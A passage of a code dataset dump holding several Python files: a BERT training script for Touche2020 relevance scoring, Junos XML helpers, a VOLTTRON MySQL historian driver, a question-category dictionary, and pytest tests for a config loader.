exit(1)\n else:\n break\n\n if index % 100 == 0:\n print(\"[PROGRESS] \", index, \" of \", size)\n\n Documents = pandas.DataFrame(fullText, columns=[\"uuid\", \"trec_id\", \"FullText\"])\n print(\"[INFO] Saving UUID-Text.csv\")\n Documents.to_csv(path_or_buf=\"./res/UUID-Text.csv\", index=False)\n\n return pandas.merge(Documents, data, how=\"inner\", on=[\"trec_id\", \"uuid\"])\n\n\ndef split_data(\n data: pandas.DataFrame, testTopicID\n) -> (pandas.DataFrame, pandas.DataFrame, List[float]):\n\n frames = []\n if isinstance(testTopicID, int):\n test_df = pandas.DataFrame(data.loc[data[\"TopicID\"] == testTopicID])\n else:\n for i in testTopicID:\n buffer = data.loc[data[\"TopicID\"] == i]\n frames.append(buffer)\n\n test_df = pandas.concat(frames)\n\n train_df = pandas.concat([data, test_df]).drop_duplicates(keep=False)\n\n train_df = train_df[[\"Topic\", \"FullText\", \"Score\"]]\n train_df.rename(\n columns={\"Topic\": \"text_a\", \"FullText\": \"text_b\", \"Score\": \"labels\"},\n inplace=True,\n )\n test_df = test_df[[\"Topic\", \"FullText\", \"Score\"]]\n test_df.rename(\n columns={\"Topic\": \"text_a\", \"FullText\": \"text_b\", \"Score\": \"labels\"},\n inplace=True,\n )\n\n # calculating pos_weights based on trainings data\n pos_weights = train_df[\"labels\"].value_counts(normalize=True).sort_index()\n logging.info(\"Frequencies are:\\n {}\".format(pos_weights.to_string()))\n pos_weights = pos_weights.tolist()\n pos_weights = [1 - element for element in pos_weights]\n logging.info(\"Pos_weights are:\\n{}\".format(\" \".join(map(str, pos_weights))))\n\n return train_df, test_df, pos_weights\n\n\ndef train(\n train_df: pandas.DataFrame,\n test_df: pandas.DataFrame,\n save_dir: str,\n project_name: str,\n pos_weights: List[float] = None,\n testTopicID: int = None,\n use_custom_accuracy: bool = False,\n use_early_stopping: bool = False,\n freeze_encoder: bool = True,\n):\n\n if testTopicID is None:\n save_path = Path(save_dir) / Path(project_name) / Path(\"Topic\" + \"undefined\")\n else:\n save_path = (\n Path(save_dir) / Path(project_name) / Path(\"Topic\" + str(testTopicID))\n )\n\n model_args = ClassificationArgs()\n model_args.num_train_epochs = 30\n model_args.reprocess_input_data = True\n model_args.overwrite_output_dir = True\n model_args.wandb_project = project_name\n model_args.save_eval_checkpoints = True\n model_args.save_model_every_epoch = False\n model_args.save_steps = -1\n model_args.output_dir = save_path\n model_args.sliding_window = True\n model_args.learning_rate = 1e-9\n model_args.train_batch_size = 4\n model_args.eval_batch_size = 4\n\n if use_early_stopping:\n model_args.use_early_stopping = True\n model_args.early_stopping_delta = 0.01\n model_args.early_stopping_metric = \"mcc\"\n model_args.early_stopping_metric_minimize = False\n model_args.early_stopping_patience = 3\n model_args.evaluate_during_training_steps = 1000\n\n # Freeze encoder Layers\n if freeze_encoder:\n model_args.train_custom_parameters_only = True\n model_args.custom_parameter_groups = [\n {\"params\": [\"classifier.weight\", \"classifier.bias\"], \"lr\": 1e-5}\n ]\n\n # Create a ClassificationModel\n\n if pos_weights is None:\n model = ClassificationModel(\n \"bert\",\n \"bert-base-cased\",\n use_cuda=torch.cuda.is_available(),\n num_labels=3,\n args=model_args,\n )\n else:\n model = ClassificationModel(\n \"bert\",\n \"bert-base-cased\",\n use_cuda=torch.cuda.is_available(),\n num_labels=3,\n weight=pos_weights,\n args=model_args,\n )\n\n # Train the model\n logging.info(\"Starting training\")\n print(model.get_named_parameters())\n gpu_lock.acquire()\n\n if use_custom_accuracy:\n model.train_model(train_df, eval_df=test_df, acc=accuracy_score)\n else:\n print(1)\n # model.train_model(train_df, eval_df=test_df)\n\n # Evaluate the model\n logging.info(\"Evaluating the model\")\n save = save_path / \"hanging-1\"\n save.mkdir(parents=True, exist_ok=True)\n\n if use_custom_accuracy:\n result, model_outputs, wrong_predictions = model.eval_model(\n test_df, acc=accuracy_score\n )\n else:\n print(1)\n # result, model_outputs, wrong_predictions = model.eval_model(test_df)\n\n save_path = save_path / \"data\"\n save_path.mkdir(parents=True, exist_ok=True)\n output = []\n save = save_path / \"hanging0\"\n save.mkdir(parents=True, exist_ok=True)\n\n for index, row in test_df.iterrows():\n predictions, raw_outputs = model.predict([[row[\"text_a\"], row[\"text_b\"]]])\n\n output.append(predictions[0])\n\n save = save_path / \"hanging1\"\n save.mkdir(parents=True, exist_ok=True)\n logging.info(\"Saving train and test data\")\n test_df[\"predictions\"] = output\n train_df.to_csv(path_or_buf=save_path / \"train.csv\", index=True)\n test_df.to_csv(path_or_buf=save_path / \"test.csv\", index=True)\n logging.info(\"Finisched\")\n save = save_path / \"hanging2\"\n save.mkdir(parents=True, exist_ok=True)\n\n\ndef use_bert(**kwargs):\n run = wandb.init(\n project=kwargs.get(\"project_name\"),\n notes=\"Test-Topic : \" + str(kwargs.get(\"testTopicID\")),\n reinit=True,\n )\n\n train(**kwargs)\n run.finish()\n if torch.cuda.is_available():\n torch.cuda.empty_cache()\n gc.collect()\n\n\nif __name__ == \"__main__\":\n\n topics = Path(\"./res/topics-task-2.xml\")\n qrels = Path(\"./res/touche2020-task2-relevance-withbaseline.qrels\")\n ID_UUID = Path(\"./res/touche20-task2-docs-ID-UUID\")\n save_dir = Path(\"./saves/\")\n name = \"other\"\n\n current_dir = Path.cwd()\n subprocess.call([\"chmod\", \"-R\", \"777\", current_dir])\n topics = current_dir / topics\n qrels = current_dir / qrels\n ID_UUID = current_dir / ID_UUID\n save_dir = current_dir / save_dir\n auth = Auth(current_dir.parent)\n keyChatNoir = auth.get_key(\"WandB\")\n logging.basicConfig(\n filename=current_dir / \"run.log\", encoding=\"utf-8\", level=logging.DEBUG\n )\n\n topics = get_titles(topics)\n id = 1\n topic_df = []\n for topic in topics:\n buffer = id, topic\n topic_df.append(buffer)\n id = id + 1\n\n topic_df = pandas.DataFrame(topic_df, columns=[\"TopicID\", \"Topic\"])\n qrels = pandas.read_csv(\n qrels, sep=\" \", names=[\"TopicID\", \"Spacer\", \"trec_id\", \"Score\"]\n )\n IDS = pandas.read_csv(ID_UUID, names=[\"uuid\", \"trec_id\"])\n buffer = pandas.merge(IDS, qrels, how=\"inner\", on=[\"trec_id\"])\n buffer = pandas.merge(buffer, topic_df, how=\"inner\", on=[\"TopicID\"])\n data = uuidToText(buffer)\n\n WandBKey = auth.get_key(\"WandB\")\n os.environ[\"WANDB_API_KEY\"] = WandBKey\n multiprocessing.set_start_method(\"spawn\")\n\n # prepare first datasets\n gpu_lock = multiprocessing.Lock()\n train_df, test_df, pos_weights = split_data(data, 1)\n p_old = multiprocessing.Process(\n target=use_bert,\n kwargs={\n \"train_df\": train_df,\n \"test_df\": test_df,\n \"pos_weights\": pos_weights,\n \"testTopicID\": i,\n \"save_dir\": save_dir,\n \"project_name\": name,\n },\n )\n\n for i in range(30, 51):\n p_new = multiprocessing.Process(\n target=use_bert,\n kwargs={\n \"train_df\": train_df,\n \"test_df\": test_df,\n \"pos_weights\": pos_weights,\n \"testTopicID\": i,\n \"save_dir\": save_dir,\n \"project_name\": name,\n },\n )\n p_new.start()\n train_df, test_df, pos_weights = split_data(data, i + 1)\n p_old.join()\n gpu_lock.release()\n\n gc.collect()\n use_bert(\n kwargs={\n \"data\": data,\n \"testTopicID\": i,\n \"save_dir\": save_dir,\n \"project_name\": name,\n }\n )\n print(i)\n if torch.cuda.is_available():\n torch.cuda.empty_cache()\n gc.collect()\n os.chmod(current_dir, 0o777)\n","sub_path":"src/scores/Bert_Docker/TrainAndEvaluate.py","file_name":"TrainAndEvaluate.py","file_ext":"py","file_size_in_byte":11181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"314313687","text":"# jxml.py\n\n\"\"\"\n These are Junos XML 'helper' definitions use for generic XML processing\n\n .DEL to delete an item\n .REN to rename an item, requires the use of NAME()\n\n .INSERT(<'before'|'after'>) to reorder an item, requires the use of NAME() \n .BEFORE to reorder an item before another, requires the use of NAME()\n .AFTER to reorder an item after another, requires the use of NAME()\n\n .NAME(name) to assign the name attribute\n\n\"\"\"\n\nDEL = {'delete': 'delete'} # Junos XML resource delete\nREN = {'rename': 'rename'} # Junos XML resource rename\nACTIVATE = {'active': 'active'} # activate resource\nDEACTIVATE = {'inactive': 'inactive'} # deactivate resource\nREPLACE = {'replace': 'replace'} # replace elements\n\ndef NAME(name): return { 'name': name }\ndef INSERT(cmd): return {'insert': cmd}\n\nBEFORE = {'insert': 'before'}\nAFTER = {'insert': 'after'}\n\n# used with to load only the object identifiers and \n# not all the subsequent configuration\n\nNAMES_ONLY = {'recurse': \"false\"}\n\n# for , attributes to retrieve from apply-groups\nINHERIT = {'inherit': 'inherit'}\nINHERIT_GROUPS = {'inherit':'inherit', 'groups':'groups'}\nINHERIT_DEFAULTS = {'inherit':'defaults', 'groups':'groups'}\n\ndef remove_namespaces( xml ):\n for elem in xml.getiterator():\n i = elem.tag.find('}')\n if i > 0: elem.tag = elem.tag[i+1:]\n return xml\n\ndef rpc_error( rpc_xml ):\n \"\"\"\n extract the various bits from an element\n into a dictionary\n \"\"\"\n remove_namespaces( rpc_xml )\n\n if 'rpc-reply' == rpc_xml.tag:\n rpc_xml = rpc_xml[0]\n\n def find_strip(x):\n ele = rpc_xml.find(x)\n return ele.text.strip() if None != ele else None\n\n this_err = {}\n this_err['severity'] = find_strip('error-severity')\n this_err['source'] = find_strip('source-daemon')\n this_err['edit_path'] = find_strip('error-path')\n this_err['bad_element'] = find_strip('error-info/bad-element')\n this_err['message'] = find_strip('error-message')\n\n return this_err\n\n\n","sub_path":"lib/jnpr/junos/jxml.py","file_name":"jxml.py","file_ext":"py","file_size_in_byte":2031,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"10423832","text":"# -*- coding: utf-8 -*- {{{\n# vim: set fenc=utf-8 ft=python sw=4 ts=4 sts=4 et:\n\n# Copyright (c) 2017, Battelle Memorial Institute\n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions\n# are met:\n#\n# 1. Redistributions of source code must retain the above copyright\n# notice, this list of conditions and the following disclaimer.\n# 2. Redistributions in binary form must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer in\n# the documentation and/or other materials provided with the\n# distribution.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS\n# \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT\n# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR\n# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT\n# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,\n# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT\n# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,\n# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY\n# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\n# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n# The views and conclusions contained in the software and documentation\n# are those of the authors and should not be interpreted as representing\n# official policies, either expressed or implied, of the FreeBSD\n# Project.\n#\n# This material was prepared as an account of work sponsored by an\n# agency of the United States Government. Neither the United States\n# Government nor the United States Department of Energy, nor Battelle,\n# nor any of their employees, nor any jurisdiction or organization that\n# has cooperated in the development of these materials, makes any\n# warranty, express or implied, or assumes any legal liability or\n# responsibility for the accuracy, completeness, or usefulness or any\n# information, apparatus, product, software, or process disclosed, or\n# represents that its use would not infringe privately owned rights.\n#\n# Reference herein to any specific commercial product, process, or\n# service by trade name, trademark, manufacturer, or otherwise does not\n# necessarily constitute or imply its endorsement, recommendation, or\n# favoring by the United States Government or any agency thereof, or\n# Battelle Memorial Institute. The views and opinions of authors\n# expressed herein do not necessarily state or reflect those of the\n# United States Government or any agency thereof.\n#\n# PACIFIC NORTHWEST NATIONAL LABORATORY\n# operated by BATTELLE for the UNITED STATES DEPARTMENT OF ENERGY\n# under Contract DE-AC05-76RL01830\n# }}}\nimport ast\nimport logging\nfrom collections import defaultdict\n\nimport pytz\nimport re\nfrom basedb import DbDriver\nfrom mysql.connector import Error as MysqlError\nfrom mysql.connector import errorcode as mysql_errorcodes\nfrom volttron.platform.agent import utils\nfrom volttron.platform.agent import json as jsonapi\n\nutils.setup_logging()\n_log = logging.getLogger(__name__)\n\n\"\"\"\nImplementation of Mysql database operation for\n:py:class:`sqlhistorian.historian.SQLHistorian` and\n:py:class:`sqlaggregator.aggregator.SQLAggregateHistorian`\nFor method details please refer to base class\n:py:class:`volttron.platform.dbutils.basedb.DbDriver`\n\"\"\"\nclass MySqlFuncts(DbDriver):\n def __init__(self, connect_params, table_names):\n # kwargs['dbapimodule'] = 'mysql.connector'\n self.MICROSECOND_SUPPORT = None\n\n self.data_table = None\n self.topics_table = None\n self.meta_table = None\n self.agg_topics_table = None\n self.agg_meta_table = None\n\n if table_names:\n self.data_table = table_names['data_table']\n self.topics_table = table_names['topics_table']\n self.meta_table = table_names['meta_table']\n self.agg_topics_table = table_names.get('agg_topics_table', None)\n self.agg_meta_table = table_names.get('agg_meta_table', None)\n # This is needed when reusing the same connection. Else cursor returns\n # cached data even if we create a new cursor for each query and\n # close the cursor after fetching results\n connect_params['autocommit'] = True\n super(MySqlFuncts, self).__init__('mysql.connector', **connect_params)\n\n def init_microsecond_support(self):\n rows = self.select(\"SELECT version()\", None)\n p = re.compile('(\\d+)\\D+(\\d+)\\D+(\\d+)\\D*')\n version_nums = p.match(rows[0][0]).groups()\n if int(version_nums[0]) < 5:\n self.MICROSECOND_SUPPORT = False\n elif int(version_nums[1]) < 6:\n self.MICROSECOND_SUPPORT = False\n elif int(version_nums[2]) < 4:\n self.MICROSECOND_SUPPORT = False\n else:\n self.MICROSECOND_SUPPORT = True\n\n def setup_historian_tables(self):\n if self.MICROSECOND_SUPPORT is None:\n self.init_microsecond_support()\n\n rows = self.select(\"show tables like %s\", [self.data_table])\n if rows:\n _log.debug(\"Found table {}. Historian table exists\".format(\n self.data_table))\n return\n\n try:\n if self.MICROSECOND_SUPPORT:\n self.execute_stmt(\n 'CREATE TABLE IF NOT EXISTS ' + self.data_table +\n ' (ts timestamp(6) NOT NULL,\\\n topic_id INTEGER NOT NULL, \\\n value_string TEXT NOT NULL, \\\n UNIQUE(topic_id, ts))')\n else:\n self.execute_stmt(\n 'CREATE TABLE IF NOT EXISTS ' + self.data_table +\n ' (ts timestamp NOT NULL,\\\n topic_id INTEGER NOT NULL, \\\n value_string TEXT NOT NULL, \\\n UNIQUE(topic_id, ts))')\n\n self.execute_stmt('''CREATE INDEX data_idx\n ON ''' + self.data_table + ''' (ts ASC)''')\n self.execute_stmt('''CREATE TABLE IF NOT EXISTS ''' +\n self.topics_table +\n ''' (topic_id INTEGER NOT NULL AUTO_INCREMENT,\n topic_name varchar(512) NOT NULL,\n PRIMARY KEY (topic_id),\n UNIQUE(topic_name))''')\n self.execute_stmt('''CREATE TABLE IF NOT EXISTS '''\n + self.meta_table +\n '''(topic_id INTEGER NOT NULL,\n metadata TEXT NOT NULL,\n PRIMARY KEY(topic_id))''')\n self.commit()\n _log.debug(\"Created data topics and meta tables\")\n except MysqlError as err:\n err_msg = \"Error creating \" \\\n \"historian tables as the configured user. \" \\\n \"Please create the tables manually before \" \\\n \"restarting historian. Please refer to \" \\\n \"mysql-create*.sql files for create \" \\\n \"statements\"\n if err.errno == mysql_errorcodes.ER_TABLEACCESS_DENIED_ERROR:\n err_msg = \"Access denied : \" + err_msg\n else:\n err_msg = err.msg + \" : \" + err_msg\n raise RuntimeError(err_msg)\n\n def record_table_definitions(self, tables_def, meta_table_name):\n _log.debug(\n \"In record_table_def {} {}\".format(tables_def, meta_table_name))\n self.execute_stmt(\n 'CREATE TABLE IF NOT EXISTS ' + meta_table_name +\n ' (table_id varchar(512) PRIMARY KEY, \\\n table_name varchar(512) NOT NULL, \\\n table_prefix varchar(512));')\n\n table_prefix = tables_def.get('table_prefix', \"\")\n\n insert_stmt = 'REPLACE INTO ' + meta_table_name + \\\n ' VALUES (%s, %s, %s)'\n self.execute_stmt(insert_stmt,\n ('data_table', tables_def['data_table'],\n table_prefix))\n self.execute_stmt(insert_stmt,\n ('topics_table', tables_def['topics_table'],\n table_prefix))\n self.execute_stmt(\n insert_stmt,\n ('meta_table', tables_def['meta_table'], table_prefix),\n commit=True)\n\n def setup_aggregate_historian_tables(self, meta_table_name):\n _log.debug(\"CREATING AGG TABLES\")\n table_names = self.read_tablenames_from_db(meta_table_name)\n\n self.data_table = table_names['data_table']\n self.topics_table = table_names['topics_table']\n _log.debug(\"In setup_aggregate_historian self.topics_table\"\n \" {}\".format(self.topics_table))\n self.meta_table = table_names['meta_table']\n self.agg_topics_table = table_names.get('agg_topics_table', None)\n self.agg_meta_table = table_names.get('agg_meta_table', None)\n\n self.execute_stmt(\n 'CREATE TABLE IF NOT EXISTS ' + self.agg_topics_table +\n ' (agg_topic_id INTEGER NOT NULL AUTO_INCREMENT, \\\n agg_topic_name varchar(512) NOT NULL, \\\n agg_type varchar(512) NOT NULL, \\\n agg_time_period varchar(512) NOT NULL, \\\n PRIMARY KEY (agg_topic_id), \\\n UNIQUE(agg_topic_name, agg_type, agg_time_period));')\n\n self.execute_stmt(\n 'CREATE TABLE IF NOT EXISTS ' + self.agg_meta_table +\n '(agg_topic_id INTEGER NOT NULL, \\\n metadata TEXT NOT NULL, \\\n PRIMARY KEY(agg_topic_id));')\n self.commit()\n _log.debug(\"Created aggregate topics and meta tables\")\n\n def query(self, topic_ids, id_name_map, start=None, end=None, skip=0,\n agg_type=None, agg_period=None, count=None,\n order=\"FIRST_TO_LAST\"):\n\n table_name = self.data_table\n if agg_type and agg_period:\n table_name = agg_type + \"_\" + agg_period\n\n query = '''SELECT topic_id, ts, value_string\n FROM ''' + table_name + '''\n {where}\n {order_by}\n {limit}\n {offset}'''\n\n if self.MICROSECOND_SUPPORT is None:\n self.init_microsecond_support()\n\n where_clauses = [\"WHERE topic_id = %s\"]\n args = [topic_ids[0]]\n\n if start is not None:\n if start.tzinfo != pytz.UTC:\n start = start.astimezone(pytz.UTC)\n if not self.MICROSECOND_SUPPORT:\n start_str = start.isoformat()\n start = start_str[:start_str.rfind('.')]\n\n if end is not None:\n if end.tzinfo !=pytz.UTC:\n end = end.astimezone(pytz.UTC)\n if not self.MICROSECOND_SUPPORT:\n end_str = end.isoformat()\n end = end_str[:end_str.rfind('.')]\n\n if start and end and start == end:\n where_clauses.append(\"ts = %s\")\n args.append(start)\n else:\n if start:\n where_clauses.append(\"ts >= %s\")\n args.append(start)\n if end:\n where_clauses.append(\"ts < %s\")\n args.append(end)\n\n where_statement = ' AND '.join(where_clauses)\n\n order_by = 'ORDER BY ts ASC'\n if order == 'LAST_TO_FIRST':\n order_by = ' ORDER BY topic_id DESC, ts DESC'\n\n # can't have an offset without a limit\n # -1 = no limit and allows the user to\n # provide just an offset\n if count is None:\n count = 100\n\n limit_statement = 'LIMIT %s'\n args.append(int(count))\n\n offset_statement = ''\n if skip > 0:\n offset_statement = 'OFFSET %s'\n args.append(skip)\n\n _log.debug(\"About to do real_query\")\n values = defaultdict(list)\n for topic_id in topic_ids:\n args[0] = topic_id\n values[id_name_map[topic_id]] = []\n real_query = query.format(where=where_statement,\n limit=limit_statement,\n offset=offset_statement,\n order_by=order_by)\n _log.debug(\"Real Query: \" + real_query)\n _log.debug(\"args: \" + str(args))\n\n cursor = self.select(real_query, args, fetch_all=False)\n if cursor:\n for _id, ts, value in cursor:\n values[id_name_map[topic_id]].append(\n (utils.format_timestamp(ts.replace(tzinfo=pytz.UTC)),\n jsonapi.loads(value)))\n cursor.close()\n return values\n\n def insert_meta_query(self):\n return '''REPLACE INTO ''' + self.meta_table + ''' values(%s, %s)'''\n\n def insert_data_query(self):\n return '''REPLACE INTO ''' + self.data_table + \\\n ''' values(%s, %s, %s)'''\n\n def insert_topic_query(self):\n _log.debug(\"In insert_topic_query - self.topic_table \"\n \"{}\".format(self.topics_table))\n return '''INSERT INTO ''' + self.topics_table + ''' (topic_name)\n values (%s)'''\n\n def update_topic_query(self):\n return '''UPDATE ''' + self.topics_table + ''' SET topic_name = %s\n WHERE topic_id = %s'''\n\n def get_aggregation_list(self):\n return ['AVG', 'MIN', 'MAX', 'COUNT', 'SUM', 'BIT_AND', 'BIT_OR',\n 'BIT_XOR', 'GROUP_CONCAT', 'STD', 'STDDEV', 'STDDEV_POP',\n 'STDDEV_SAMP', 'VAR_POP', 'VAR_SAMP', 'VARIANCE']\n\n def insert_agg_topic_stmt(self):\n _log.debug(\"Insert aggregate topics stmt inserts \"\n \"into {}\".format(self.agg_topics_table))\n return '''INSERT INTO ''' + self.agg_topics_table + '''\n (agg_topic_name, agg_type, agg_time_period )\n values (%s, %s, %s)'''\n\n def update_agg_topic_stmt(self):\n return '''UPDATE ''' + self.agg_topics_table + ''' SET\n agg_topic_name = %s WHERE agg_topic_id = %s '''\n\n def replace_agg_meta_stmt(self):\n return '''REPLACE INTO ''' + self.agg_meta_table + ''' values(%s,\n %s)'''\n\n def get_topic_map(self):\n q = \"SELECT topic_id, topic_name FROM \" + self.topics_table + \";\"\n rows = self.select(q, None)\n _log.debug(\"loading topic map from db\")\n id_map = dict()\n name_map = dict()\n for t, n in rows:\n id_map[n.lower()] = t\n name_map[n.lower()] = n\n _log.debug(id_map)\n _log.debug(name_map)\n return id_map, name_map\n\n def get_agg_topics(self):\n _log.debug(\"in get_agg_topics\")\n try:\n query = \"SELECT agg_topic_name, agg_type, agg_time_period, \" \\\n \"metadata FROM \" + self.agg_topics_table + \" as t, \" + \\\n self.agg_meta_table + \" as m WHERE t.agg_topic_id = \" \\\n \"m.agg_topic_id \"\n rows = self.select(query, None)\n topics = []\n for row in rows:\n meta = ast.literal_eval(row[3])['configured_topics']\n topics.append((row[0], row[1], row[2], meta))\n return topics\n except MysqlError as e:\n if e.errno == mysql_errorcodes.ER_NO_SUCH_TABLE:\n return []\n else:\n raise\n\n def get_agg_topic_map(self):\n _log.debug(\"in get_agg_topic_map\")\n try:\n q = \"SELECT agg_topic_id, agg_topic_name, agg_type, \" \\\n \"agg_time_period \" \\\n \"FROM \" + self.agg_topics_table\n rows = self.select(q, None)\n _log.debug(\"loading agg_topic map from db\")\n id_map = dict()\n for row in rows:\n _log.debug(\"rows from aggregate_topics {}\".format(row))\n id_map[(row[1].lower(), row[2], row[3])] = row[0]\n return id_map\n except MysqlError as e:\n if e.errno == mysql_errorcodes.ER_NO_SUCH_TABLE:\n return {}\n else:\n raise\n\n def query_topics_by_pattern(self, topic_pattern):\n q = \"SELECT topic_id, topic_name FROM \" + self.topics_table + \\\n \" WHERE lower(topic_name) REGEXP lower('\" + topic_pattern + \"');\"\n\n rows = self.select(q, None)\n _log.debug(\"loading topic map from db\")\n id_map = dict()\n for t, n in rows:\n id_map[n] = t\n _log.debug(\"topics that matched the pattern {} : {}\".format(\n topic_pattern, id_map))\n return id_map\n\n def create_aggregate_store(self, agg_type, agg_time_period):\n table_name = agg_type + '''_''' + agg_time_period\n if self.MICROSECOND_SUPPORT is None:\n self.init_microsecond_support()\n\n stmt = \"CREATE TABLE IF NOT EXISTS \" + table_name + \\\n \" (ts timestamp(6) NOT NULL, topic_id INTEGER NOT NULL, \" \\\n \"value_string TEXT NOT NULL, topics_list TEXT,\" \\\n \" UNIQUE(topic_id, ts),\" \\\n \"INDEX (ts ASC))\"\n if not self.MICROSECOND_SUPPORT:\n stmt = \"CREATE TABLE IF NOT EXISTS \" + table_name + \\\n \" (ts timestamp NOT NULL, topic_id INTEGER NOT NULL, \" \\\n \"value_string TEXT NOT NULL, topics_list TEXT,\" \\\n \" UNIQUE(topic_id, ts),\" \\\n \"INDEX (ts ASC))\"\n return self.execute_stmt(stmt, commit=True)\n\n def insert_aggregate_stmt(self, table_name):\n return '''REPLACE INTO ''' + table_name + \\\n ''' values(%s, %s, %s, %s)'''\n\n def collect_aggregate(self, topic_ids, agg_type, start=None, end=None):\n if isinstance(agg_type, str):\n if agg_type.upper() not in ['AVG', 'MIN', 'MAX', 'COUNT', 'SUM']:\n raise ValueError(\n \"Invalid aggregation type {}\".format(agg_type))\n query = '''SELECT ''' \\\n + agg_type + '''(value_string), count(value_string) FROM ''' \\\n + self.data_table + ''' {where}'''\n where_clauses = [\"WHERE topic_id = %s\"]\n args = [topic_ids[0]]\n if len(topic_ids) > 1:\n where_str = \"WHERE topic_id IN (\"\n for _ in topic_ids:\n where_str += \"%s, \"\n where_str = where_str[:-2] # strip last comma and space\n where_str += \") \"\n where_clauses = [where_str]\n args = topic_ids[:]\n\n if start is not None:\n where_clauses.append(\"ts >= %s\")\n if self.MICROSECOND_SUPPORT:\n args.append(start)\n else:\n start_str = start.isoformat()\n args.append(start_str[:start_str.rfind('.')])\n\n if end is not None:\n where_clauses.append(\"ts < %s\")\n if self.MICROSECOND_SUPPORT:\n args.append(end)\n else:\n end_str = end.isoformat()\n args.append(end_str[:end_str.rfind('.')])\n\n where_statement = ' AND '.join(where_clauses)\n\n real_query = query.format(where=where_statement)\n _log.debug(\"Real Query: \" + real_query)\n _log.debug(\"args: \" + str(args))\n\n rows = self.select(real_query, args)\n if rows:\n return rows[0][0], rows[0][1]\n else:\n return 0, 0\n","sub_path":"volttron/platform/dbutils/mysqlfuncts.py","file_name":"mysqlfuncts.py","file_ext":"py","file_size_in_byte":19599,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"47642394","text":"question_category = {'what': 'what',\n #'where': 'where', as it is handled by map\n 'why': 'why',\n 'who': 'who',\n 'when' : 'when',\n 'how many': 'quantity',\n 'how much': 'quantity',\n 'are': 'boolean',\n 'can': 'boolean',\n 'will': 'boolean',\n }\n\n# keeping it separate to prioritize questions\nquestion_markers = ['what', 'when',\n #'where', as it is handled by map\n 'why', 'who', 'how many', 'how much', 'will', 'can', 'are']","sub_path":"core/understander/business/general/question_category_dict.py","file_name":"question_category_dict.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"449440434","text":"import inspect\nimport os\nimport pytest\nimport multiprocessing as mp\nfrom pathlib import Path\n\nfrom py_config_runner import ConfigObject, load_module\n\n\ndef test_config_object(config_filepath):\n\n config = ConfigObject(config_filepath)\n assert \"a\" in config\n assert config[\"a\"] == config.a == config.get(\"a\") == 1\n assert \"b\" in config\n assert config[\"b\"] == config.b == config.get(\"b\") == 2\n assert config[\"_data\"] == config._data == config.get(\"_data\") == 3\n\n config.c = 3\n config[\"d\"] = 4\n\n assert \"c\" in config\n assert config[\"c\"] == config.c == config.get(\"c\") == 3\n assert config[\"d\"] == config.d == config.get(\"d\") == 4\n assert \"config_filepath\" in config\n assert isinstance(config.config_filepath, Path)\n assert config.config_filepath == config_filepath\n assert config[\"config_filepath\"] == config_filepath\n assert config.get(\"config_filepath\") == config_filepath\n\n for k in config:\n assert not k.startswith(\"__\")\n\n def foo(**kwargs):\n for k in [\"a\", \"b\", \"c\", \"d\", \"config_filepath\"]:\n assert k in kwargs\n\n foo(**config)\n\n for k, v in config.__dict__.items():\n assert not inspect.ismodule(v)\n\n\ndef test_config_object_length(config_filepath):\n config = ConfigObject(config_filepath)\n\n assert len(config) == 4 + 1 # config + config_filepath\n\n\ndef test_config_object_items(config_filepath):\n config = ConfigObject(config_filepath)\n\n res = [(k, v) for k, v in config.items()]\n assert len(res) == 4 + 1 # config + config_filepath\n\n\ndef test_config_object_loading(config_filepath):\n config = ConfigObject(config_filepath)\n\n def foo(**kwargs):\n for k in [\"a\", \"b\", \"config_filepath\"]:\n assert k in kwargs\n\n foo(**config)\n\n\ndef test_config_object_repr(config_filepath):\n config = ConfigObject(config_filepath)\n\n out = repr(config)\n assert \"a\" in out\n assert \"b\" in out\n assert \"data\" in out\n assert \"_data\" in out\n\n\ndef test_config_object_init_kwargs(config_filepath):\n # Pass a as kwargs\n config = ConfigObject(config_filepath, a=10, another_data=123)\n # assert that a is overriden by config_filepath\n assert config.a == 1\n assert config.another_data == 123\n\n\ndef test_config_object_lazy_load(dirname):\n filepath = dirname / \"bad_config.py\"\n\n s = \"\"\"\na = 123\n\nraise RuntimeError(\"error\")\n \"\"\"\n\n with filepath.open(\"w\") as h:\n h.write(s)\n\n config = ConfigObject(filepath)\n\n with pytest.raises(RuntimeError, match=r\"error\"):\n assert config.a == 123\n\n\ndef test_config_object_mutations(dirname):\n filepath = dirname / \"custom_module.py\"\n\n s = \"\"\"\n\na = 123\nb = 12.3\nc = \"abc\"\nd = True\n# e = None\n\n\ndef func(x):\n return x + a\n\nout = func(10)\n\ndef func2(x):\n return x + b\n\nout2 = func2(1.0)\n\n\ndef func3(x):\n if x == \"abc\":\n return 1.0\n elif x == \"cba\":\n return -1.0\n else:\n return 0.0\n\nout3 = func3(c)\n\n\nout4 = 10 if d else -10\n# out5 = 10 if e is None else -10\n \"\"\"\n\n with filepath.open(\"w\") as h:\n h.write(s)\n\n config = ConfigObject(filepath, mutations={\"a\": 333, \"b\": 22.0, \"c\": \"cba\", \"d\": False})\n\n assert config.a == 333\n assert config.out == 10 + 333\n assert config.b == 22.0\n assert config.out2 == 1.0 + 22.0\n assert config.c == \"cba\"\n assert config.out3 == -1.0\n assert 